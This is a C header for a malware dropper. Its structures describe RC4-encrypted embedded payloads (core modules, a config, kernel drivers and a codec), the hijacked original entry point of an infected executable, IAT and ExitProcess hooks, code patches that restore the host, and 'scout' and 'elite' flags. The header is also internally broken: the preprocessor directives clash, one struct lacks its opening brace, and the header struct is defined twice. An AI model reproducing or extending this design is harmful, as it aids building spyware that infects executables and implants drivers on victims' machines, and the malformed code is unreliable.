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#ifndef DropperHeader_h__
#define DropperHeader_h__

#include "common.h"
#include "rc4.h"

#ifdef WIN32
#define ALIGN4 __declspec(align(4))
#define ALIGN4 __attribute__((aligned(4)))

typedef void (*WINSTARTFUNC)(void);

typedef ALIGN4 struct _data_section_blob {
    DWORD offset;
    DWORD size;
} DataSectionBlob;

typedef ALIGN4 struct _patch_blob {
    DWORD offset;
    DWORD size;
} PatchBlob;

typedef ALIGN4 struct _data_section_cryptopack {
    DWORD offset;
    DWORD size;
    DWORD original_size;
    DWORD characteristics;
} DataSectionCryptoPack;

typedef ALIGN4 struct _data_section_files {
    struct {
        DataSectionBlob core;
        DataSectionBlob core64;
        DataSectionBlob config;
        DataSectionBlob driver;
        DataSectionBlob driver64;
        DataSectionBlob codec;
    } names;
    DataSectionCryptoPack core;
    DataSectionCryptoPack core64;
    DataSectionCryptoPack config;
    DataSectionCryptoPack driver;
    DataSectionCryptoPack driver64;
    DataSectionCryptoPack codec;
} DataSectionFiles;

typedef  __declspec(align(4)) struct _data_section_header 
    // RC4
    // Encryption key
    CHAR rc4key[RC4KEYLEN];

    // OEP
    WINSTARTFUNC   pfn_OriginalEntryPoint;

    // Synchronization
    DWORD synchro;

    // used to pass full qualified path to core thread
    CHAR *dllPath;

    // our own functions
    struct {
        DataSectionBlob newEntryPoint;
        DataSectionBlob coreThread;
        DataSectionBlob dumpFile;
        DataSectionBlob exitProcessHook;
        DataSectionBlob exitHook;
        DataSectionBlob GetCommandLineAHook;
        DataSectionBlob GetCommandLineWHook;
        DataSectionBlob rvaToOffset;
        DataSectionBlob rc4;
        DataSectionBlob hookIAT;
        DataSectionBlob load;
    } functions;

    DataSectionFiles files;

    PatchBlob stage1;
    PatchBlob stage2;

    DataSectionBlob restore;

    ULONG exeType;
    BOOL isScout;

    CHAR instDir[10];
    CHAR eliteExports[18];
    CHAR version[20];
} DropperHeader;

typedef ALIGN4 struct _data_section_header {
    // RC4 encryption key
    CHAR rc4key[RC4KEYLEN];
    // OEP
    WINSTARTFUNC   pfn_OriginalEntryPoint;
    // Synchronization
    DWORD synchro;
    // used to pass full qualified path to core thread
    CHAR *dllPath;
    // used to hook ExitProcess on Vista (Vista deletes call names from Thunks when EXE is loaded)
    struct {
        int ExitProcess;
        int exit;
        int _exit;
    } hookedCalls;
    // our own functions
    struct {
        DataSectionBlob entryPoint;
        DataSectionBlob coreThread;
        DataSectionBlob dumpFile;
        DataSectionBlob exitProcessHook;
        DataSectionBlob exitHook;
        DataSectionBlob GetCommandLineAHook;
        DataSectionBlob GetCommandLineWHook;
        DataSectionBlob rvaToOffset;
        DataSectionBlob rc4;
        DataSectionBlob hookCall;
        DataSectionBlob load;
    } functions;                    // COOKED

    // appended files
    DataSectionFiles files;            // COOKED

    // stub code patches to restore original code
    PatchBlob stage1;
    PatchBlob stage2;

    // saves state, jump to dropper and return to OEP
    DataSectionBlob restore;

    ULONG exeType;
    BOOL isScout;

    CHAR instDir[10];
    CHAR eliteExports[18];
    CHAR version[20];
} DropperHeader;
#endif // DropperHeader_h__